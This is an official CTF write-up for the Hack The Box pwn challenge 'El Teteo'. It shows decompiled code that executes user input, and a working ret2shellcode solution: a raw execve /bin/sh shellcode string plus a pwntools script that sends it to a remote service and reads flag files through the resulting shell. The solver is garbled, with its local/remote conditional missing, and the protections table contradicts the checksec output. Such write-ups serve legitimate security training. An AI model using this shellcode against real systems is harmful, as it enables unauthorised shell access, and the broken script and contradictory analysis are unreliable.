ctf-resources/htb/hacktheboo2024/pwn/[Very Easy] El Teteo/README.md

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El Teteo

16th September 2024 / Document No. DYY.102.XX

Prepared By: w3th4nds

Challenge Author(s): w3th4nds

Difficulty: Very Easy

Classification: Official


El Teteo is a very easy difficulty challenge that features ret2shellcode.


El Teteo, a mischievous ghostly djinni born with a party spirit. You have one chance to summon it and make your wish—but only if its in the mood to grant it.

Skills Required

  • Basic C.

Skills Learned

  • ret2shellcode.


First of all, we start with a checksec:

pwndbg> checksec 
Arch:     amd64
RELRO:      Full RELRO
Stack:      Canary found
NX:         NX unknown - GNU_STACK missing
PIE:        PIE enabled
Stack:      Executable
RWX:        Has RWX segments
RUNPATH:    b'./glibc/'
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

Protections 🛡️

As we can see:

Protection Enabled Usage
Canary Prevents Buffer Overflows
NX Disables code execution on stack
PIE Randomizes the base address of the binary
RelRO Full Makes some binary sections read-only

The program's interface

We already see that when we enter something, the program crashes with "Illegal Instruction". This means that the program tries to execute something that is not a valid instruction. We also see that NX is disabled, meaning we can execute arbitrary code.


Starting with main():

00001366  int32_t main(int32_t argc, char** argv, char** envp)

00001366  {
0000137e      void* fsbase;
0000137e      int64_t canary = *(uint64_t*)((char*)fsbase + 0x28);
00001392      cls();
0000139e      void* const var_a8 = "\x1b[1;33m";
000013ac      void* const var_a0 = "\x1b[1;36m";
000013ba      void* const var_98 = "\x1b[1;32m";
000013c8      void* const var_90 = "\x1b[1;31m";
000013d6      void* const var_88 = "\x1b[1;34m";
000013e1      void* const var_80 = "\x1b[1;35m";
000013ec      void* const var_78 = "\x1b[1;37m";
000013fc      srand(time(nullptr));
00001448      printf(&data_204e, &var_a8[((int64_t)(rand() % 6))]);
0000147a      int64_t rax_22 = &var_a8[((int64_t)(rand() % 6))];
000014b6      int64_t rbx = &var_a8[((int64_t)(rand() % 6))];
000014f2      int64_t rdi_1 = &var_a8[((int64_t)(rand() % 6))];
0000152e      int64_t rsi_11 = &var_a8[((int64_t)(rand() % 6))];
0000156a      int64_t rcx_24 = &var_a8[((int64_t)(rand() % 6))];
000015a6      int64_t rdx_7 = &var_a8[((int64_t)(rand() % 6))];
000015e2      int64_t r10 = &var_a8[((int64_t)(rand() % 6))];
0000161e      int64_t r11 = &var_a8[((int64_t)(rand() % 6))];
0000165a      int64_t r8 = &var_a8[((int64_t)(rand() % 6))];
00001696      int64_t r9 = &var_a8[((int64_t)(rand() % 6))];
000016d2      int64_t r14 = &var_a8[((int64_t)(rand() % 6))];
0000170e      int64_t r15 = &var_a8[((int64_t)(rand() % 6))];
0000174a      int64_t r12 = &var_a8[((int64_t)(rand() % 6))];
00001786      int64_t r13 = &var_a8[((int64_t)(rand() % 6))];
000017c2      int64_t rax_149 = &var_a8[((int64_t)(rand() % 6))];
000017fe      int64_t rbx_1 = &var_a8[((int64_t)(rand() % 6))];
0000183a      int64_t rdi_2 = &var_a8[((int64_t)(rand() % 6))];
00001876      int64_t rsi_40 = &var_a8[((int64_t)(rand() % 6))];
000018b2      int64_t rcx_62 = &var_a8[((int64_t)(rand() % 6))];
000018ee      int64_t rdx_43 = &var_a8[((int64_t)(rand() % 6))];
0000192a      int64_t r10_1 = &var_a8[((int64_t)(rand() % 6))];
00001966      int64_t r11_1 = &var_a8[((int64_t)(rand() % 6))];
000019a2      int64_t r8_1 = &var_a8[((int64_t)(rand() % 6))];
000019de      int64_t r9_1 = &var_a8[((int64_t)(rand() % 6))];
00001a1a      int64_t r14_1 = &var_a8[((int64_t)(rand() % 6))];
00001a56      int64_t r15_1 = &var_a8[((int64_t)(rand() % 6))];
00001a92      int64_t r14_2 = &var_a8[((int64_t)(rand() % 6))];
00001ac7      int64_t r15_2 = &var_a8[((int64_t)(rand() % 6))];
00001afc      int64_t r13_1 = &var_a8[((int64_t)(rand() % 6))];
00001b31      int64_t r12_1 = &var_a8[((int64_t)(rand() % 6))];
00001b66      int64_t rbx_2 = &var_a8[((int64_t)(rand() % 6))];
00001c63      printf(&data_2058, &var_a8[((int64_t)(rand() % 6))], rbx_2, r12_1, r13_1, r15_2, r14_2, r15_1, r14_1, r9_1, r8_1, r11_1, r10_1, rdx_43, rcx_62, rsi_40, rdi_2, rbx_1, rax_149, r13, r12, r15, r14, r9, r8, r11, r10, rdx_7, rcx_24, rsi_11, rdi_1, rbx, rax_22);
00001c79      printstr("[!] I will do whatever you want,…");
00001c7e      int64_t shellcode;
00001c7e      __builtin_memset(&shellcode, 0, 0x20);
00001caf      read(0, &shellcode, 0x1f);
00001cbd      &shellcode();
00001cc8      *(uint64_t*)((char*)fsbase + 0x28);
00001cd1      if (canary == *(uint64_t*)((char*)fsbase + 0x28))
00001ce6          return 0;
00001cd3      __stack_chk_fail();
00001cd3      /* no return */
00001366  }

If we skip the "colors", the actual code is:

00001c79      printstr("[!] I will do whatever you want,…");
00001c7e      int64_t shellcode;
00001c7e      __builtin_memset(&shellcode, 0, 0x20);
00001caf      read(0, &shellcode, 0x1f);
00001cbd      &shellcode();

The program will execute whatever we store in the "shellcode" buffer. Taking that into consideration and the fact that NX is disabled, we can execute code and get shell. This payload works like a charm.

sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"


from pwn import *
import warnings
import os
context.arch = 'amd64'
context.log_level = 'critical'

fname = './el_teteo' 

LOCAL = False


  print('Running solver locally..\n')
  r    = process(fname)
  IP   = str(sys.argv[1]) if len(sys.argv) >= 2 else ''
  PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337
  r    = remote(IP, PORT)
  print(f'Running solver remotely at {IP} {PORT}\n')

# Shellcode from https://shell-storm.org/shellcode/files/shellcode-806.html
sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

# Send shellcode
r.sendlineafter('>', sc)

# Get flag
r.sendline('cat flag*')
print(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}\n')